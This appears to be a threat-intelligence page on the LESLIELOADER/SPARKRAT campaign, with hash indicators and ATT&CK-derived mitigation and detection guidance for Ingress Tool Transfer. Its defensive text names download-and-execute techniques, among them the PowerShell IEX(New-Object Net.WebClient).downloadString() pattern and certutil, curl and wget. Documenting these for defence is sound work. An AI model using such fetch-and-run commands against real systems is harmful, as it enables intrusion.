SOC Incident Toolkit
Back to Campaigns
Digital Deception: The LESLIELOADER Campaign's Mastery of Malware Misdirection

Digital Deception: The LESLIELOADER Campaign's Mastery of Malware Misdirection

SPARKRAT Loader UpdateCyber Campaign SPARKRATOngoing Cyber ThreatsNew Malware Loader

It was found by cybersecurity researchers that the SPARKRAT malware was deployed using an undocumented Golang installer, allowing it to execute undetected on target systems. Although SPARKRAT's project has been discontinued, it is still being modified for use in targeted attacks, most notably in the "DRAGONSPARK" campaign against East Asian organizations.

Indicators of Compromise

Hashes (30)

1e0d10e17bf5fc2b1dd7cfc717767d87e5fd448994445af999055bf7d7cddc0d1d5183ab2776d85285f0522a28fac6c5a61019064ca0d50308013957a3da3fc60a62649c405fd9dbf7b184b18e73333ddf23e0bcb5d46ffed1ec57b24867499bd15f5a0487443e1f0f4c1fa578d917e851560ba44741ddd031d4741e9ef92f606753ea4e95b9e161173a2a82c18ffd1f8206d852ec45da0ca70a9b71652cc95d51665f7ad568294bd5652c395a119bccd613e9b4b8cab11421eb4731c16cf3c34ca2b3f2a758d5e112f877b90a18b3e146c8add02df61720ffee7a6730c029da45bddba2ec9eace7359e1ee964b44560e9062bb9983e03a0f46cd40a861f7dc3e4efd1397b9b474168dc322a75a551bfb3fa8ded12afe1b18b0e7dcc4903fff3a7dc2a2b6c3d111c2f836e7b4d13ed082b8dea89c9b36dbca2f3260c62c1180720be599886e56191be9d4b1822dacec4d8dd3e99524d1042f6834b5d5af6fc8361d25eb3c5e0925c25bfed3eb9ebc12604edee0aeb4c8bc2f2a37e9fd1c77ebda33b5756509a726ddb42d41a59e3e5c9bb234479ce05cd1923ef9754911cc14e9b3e5d500e19151175a49cd2762810d0e9bd0187e8a29a0ad3e84281028e8aec44723249a5da2363f63511dc1d46742a9afb09e51294bcefa6a950326688c6e67b13facbf8ecdcffb5ba48002f13975f23851a3ec80547aa71d6953ce7aad42af3ba4a87699c80dd0b77f2dc04fcb24034feb26ed8bb0721da93f55d74ea8347373946abdf245f3773d1d42b76e1051c6ad0c832dc1c6bcd7158f4a0687f1f7d84c9c3c513b0e43e24c197844f1275df73f45803b1a740d4dae565f6de06bac388f2cd6df454469c+10 more

Notes

<div><b>CONCLUSION</b></div><div>The discovery of LESLIELOADER, inextricably linked to the SPARKRAT malware, underlines a salient fact in the field of cyber security: the threat landscape is in a state of rapid evolution. This evolution is a testament to the relentless creativity of cyber attackers in their quest to breach digital security measures. LESLIELOADER's advanced capabilities, which enable it to bypass defences and sneakily infiltrate legitimate system processes, point to a significant intensification in cyber warfare strategies. This underscores the imperative for cyber security experts to continuously improve detection and defence mechanisms. It is clear that countering such volatile threats requires not only vigilance, but also a proactive and collaborative approach to sharing insights and strengthening defences within the cyber security community.</div><div><br></div>

Mitigation

<div><b>MITIGATIONS</b></div><div><b><br></b></div><div>Below are some of the methods used by threat actors within this campaign.<br></div><div><b><br></b></div><div><b>Ingress Tool Transfer</b></div><div>Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).</div><div><br></div><div>On Windows, adversaries may use various utilities to download tools, such as copy, finger, certutil, and PowerShell commands such as IEX(New-Object Net.WebClient).downloadString() and Invoke-WebRequest. On Linux and macOS systems, a variety of utilities also exist, such as curl, scp, sftp, tftp, rsync, finger, and wget.</div><div><br></div><div>Adversaries may also abuse installers and package managers, such as yum or winget, to download tools to victim hosts.</div><div><br></div><div>Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system. In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.</div><div><br></div><div><h2 class="pt-3" id="mitigations" style="box-sizing: border-box; margin-top: 0px; margin-bottom: 0.5rem; line-height: 1.2; font-size: 2rem; font-family: Roboto-Light, sans-serif; color: rgb(57, 67, 76); letter-spacing: normal; padding-top: 1rem !important;">Mitigations</h2><div class="tables-mobile" style="box-sizing: border-box; overflow-y: auto; color: rgb(57, 67, 76); font-family: Roboto-Regular, sans-serif; font-size: 16px;"><table class="table table-bordered table-alternate mt-2" style="box-sizing: border-box; border-collapse: collapse; width: 1367.25px; margin-bottom: 1rem; color: rgb(33, 37, 41); border: 1px solid rgb(223, 223, 223); margin-top: 0.5rem !important; background-color: rgb(242, 242, 242) !important; empty-cells: hide;"><thead style="box-sizing: border-box;"><tr style="box-sizing: border-box;"><th style="box-sizing: border-box; text-align: inherit; padding: 0.6rem; vertical-align: bottom; border-width: 1px 1px 2px; border-style: solid; border-color: rgb(223, 223, 223) rgb(223, 223, 223) rgb(222, 226, 230); border-image: initial; font-size: 0.9rem;">ID</th><th style="box-sizing: border-box; text-align: inherit; padding: 0.6rem; vertical-align: bottom; border-width: 1px 1px 2px; border-style: solid; border-color: rgb(223, 223, 223) rgb(223, 223, 223) rgb(222, 226, 230); border-image: initial; font-size: 0.9rem;">Mitigation</th><th style="box-sizing: border-box; text-align: inherit; padding: 0.6rem; vertical-align: bottom; border-width: 1px 1px 2px; border-style: solid; border-color: rgb(223, 223, 223) rgb(223, 223, 223) rgb(222, 226, 230); border-image: initial; font-size: 0.9rem;">Description</th></tr></thead><tbody style="box-sizing: border-box; background: white; color: rgb(57, 67, 76);"><tr style="box-sizing: border-box;"><td style="box-sizing: border-box; padding: 0.75rem; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><a href="https://attack.mitre.org/mitigations/M1031" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">M1031</a></td><td style="box-sizing: border-box; padding: 0.75rem; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><a href="https://attack.mitre.org/mitigations/M1031" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">Network Intrusion Prevention</a></td><td style="box-sizing: border-box; padding: 0.75rem; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><p style="box-sizing: border-box; margin-bottom: 0px;">Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.<span id="scite-ref-510-a" class="scite-citeref-number" style="box-sizing: border-box;"><span style="box-sizing: border-box; position: relative; font-size: 12px; line-height: 0; vertical-align: baseline; top: -0.5em;"><a href="https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" target="_blank" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">[510]</a></span></span></p></td></tr></tbody></table></div><h2 class="pt-3" id="detection" style="box-sizing: border-box; margin-top: 0px; margin-bottom: 0.5rem; line-height: 1.2; font-size: 2rem; font-family: Roboto-Light, sans-serif; color: rgb(57, 67, 76); letter-spacing: normal; padding-top: 1rem !important;">Detection</h2><div class="tables-mobile" style="box-sizing: border-box; overflow-y: auto; color: rgb(57, 67, 76); font-family: Roboto-Regular, sans-serif; font-size: 16px;"><table class="table datasources-table table-bordered" style="box-sizing: border-box; border-collapse: collapse; width: 1367.25px; margin-bottom: 1rem; color: rgb(33, 37, 41); border: 1px solid rgb(223, 223, 223); empty-cells: hide;"><thead style="box-sizing: border-box;"><tr style="box-sizing: border-box; background: rgb(242, 242, 242); border-bottom: 1px solid rgb(223, 223, 223);"><th class="p-2" style="box-sizing: border-box; text-align: inherit; padding: 0.6rem; vertical-align: bottom; border-width: 1px 1px 2px; border-style: solid; border-color: rgb(223, 223, 223) rgb(223, 223, 223) rgb(222, 226, 230); border-image: initial; font-size: 0.9rem;">ID</th><th class="p-2 nowrap" style="box-sizing: border-box; text-align: inherit; padding: 0.6rem; vertical-align: bottom; border-width: 1px 1px 2px; border-style: solid; border-color: rgb(223, 223, 223) rgb(223, 223, 223) rgb(222, 226, 230); border-image: initial; font-size: 0.9rem;">Data Source</th><th class="p-2 nowrap" style="box-sizing: border-box; text-align: inherit; padding: 0.6rem; vertical-align: bottom; border-width: 1px 1px 2px; border-style: solid; border-color: rgb(223, 223, 223) rgb(223, 223, 223) rgb(222, 226, 230); border-image: initial; font-size: 0.9rem;">Data Component</th><th class="p-2" style="box-sizing: border-box; text-align: inherit; padding: 0.6rem; vertical-align: bottom; border-width: 1px 1px 2px; border-style: solid; border-color: rgb(223, 223, 223) rgb(223, 223, 223) rgb(222, 226, 230); border-image: initial; font-size: 0.9rem;">Detects</th></tr></thead><tbody style="box-sizing: border-box;"><tr class="datasource" id="uses-DS0017" style="box-sizing: border-box;"><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border-top: 1px solid rgb(223, 223, 223); border-right: 1px solid rgb(223, 223, 223); border-bottom: none; border-left: 1px solid rgb(223, 223, 223); border-image: initial;"><a href="https://attack.mitre.org/datasources/DS0017" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">DS0017</a></td><td class="nowrap" style="box-sizing: border-box; padding: 10px; vertical-align: top; border-top: 1px solid rgb(223, 223, 223); border-right: 1px solid rgb(223, 223, 223); border-bottom: none; border-left: 1px solid rgb(223, 223, 223); border-image: initial;"><a href="https://attack.mitre.org/datasources/DS0017" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">Command</a></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><a href="https://attack.mitre.org/datasources/DS0017/#Command%20Execution" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">Command Execution</a></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><p style="box-sizing: border-box; margin-bottom: 0px;">Monitor executed commands and arguments for suspicious activity associated with downloading external content.</p></td></tr><tr class="datasource" id="uses-DS0022" style="box-sizing: border-box;"><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border-top: 1px solid rgb(223, 223, 223); border-right: 1px solid rgb(223, 223, 223); border-bottom: none; border-left: 1px solid rgb(223, 223, 223); border-image: initial;"><a href="https://attack.mitre.org/datasources/DS0022" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">DS0022</a></td><td class="nowrap" style="box-sizing: border-box; padding: 10px; vertical-align: top; border-top: 1px solid rgb(223, 223, 223); border-right: 1px solid rgb(223, 223, 223); border-bottom: none; border-left: 1px solid rgb(223, 223, 223); border-image: initial;"><a href="https://attack.mitre.org/datasources/DS0022" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">File</a></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><a href="https://attack.mitre.org/datasources/DS0022/#File%20Creation" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">File Creation</a></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><p style="box-sizing: border-box; margin-bottom: 0px;">Monitor for file creation and files transferred into the network</p></td></tr><tr class="datasource" id="uses-DS0029" style="box-sizing: border-box;"><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border-top: 1px solid rgb(223, 223, 223); border-right: 1px solid rgb(223, 223, 223); border-bottom: none; border-left: 1px solid rgb(223, 223, 223); border-image: initial;"><a href="https://attack.mitre.org/datasources/DS0029" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">DS0029</a></td><td class="nowrap" style="box-sizing: border-box; padding: 10px; vertical-align: top; border-top: 1px solid rgb(223, 223, 223); border-right: 1px solid rgb(223, 223, 223); border-bottom: none; border-left: 1px solid rgb(223, 223, 223); border-image: initial;"><a href="https://attack.mitre.org/datasources/DS0029" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">Network Traffic</a></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><a href="https://attack.mitre.org/datasources/DS0029/#Network%20Connection%20Creation" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">Network Connection Creation</a></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><p style="box-sizing: border-box; margin-bottom: 0px;">Monitor for newly constructed network connections that are sent or received by untrusted hosts or creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.</p></td></tr><tr class="datacomponent datasource" id="uses-DS0029-Network Traffic Content" style="box-sizing: border-box; border-left: none;"><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border-top: none; border-right: 1px solid rgb(223, 223, 223); border-bottom: none; border-left: 1px solid rgb(223, 223, 223); border-image: initial; width: 5ex;"></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border-top: none; border-right: 1px solid rgb(223, 223, 223); border-bottom: none; border-left: 1px solid rgb(223, 223, 223); border-image: initial; width: 5ex;"></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><a href="https://attack.mitre.org/datasources/DS0029/#Network%20Traffic%20Content" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">Network Traffic Content</a></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><p style="box-sizing: border-box; margin-bottom: 0px;">Monitor network traffic content for files and other potentially malicious content, especially data coming in from abnormal/unknown domain and IPs.</p></td></tr><tr class="datacomponent datasource" id="uses-DS0029-Network Traffic Flow" style="box-sizing: border-box; border-bottom: 1px solid rgb(223, 223, 223); border-left: none;"><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border-top: none; border-right: 1px solid rgb(223, 223, 223); border-bottom: none; border-left: 1px solid rgb(223, 223, 223); border-image: initial; width: 5ex;"></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border-top: none; border-right: 1px solid rgb(223, 223, 223); border-bottom: none; border-left: 1px solid rgb(223, 223, 223); border-image: initial; width: 5ex;"></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><a href="https://attack.mitre.org/datasources/DS0029/#Network%20Traffic%20Flow" style="box-sizing: border-box; color: rgb(79, 124, 172); background-color: transparent;">Network Traffic Flow</a></td><td style="box-sizing: border-box; padding: 10px; vertical-align: top; border: 1px solid rgb(223, 223, 223);"><p style="box-sizing: border-box; margin-bottom: 0px;">Monitor network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.</p></td></tr></tbody></table></div></div>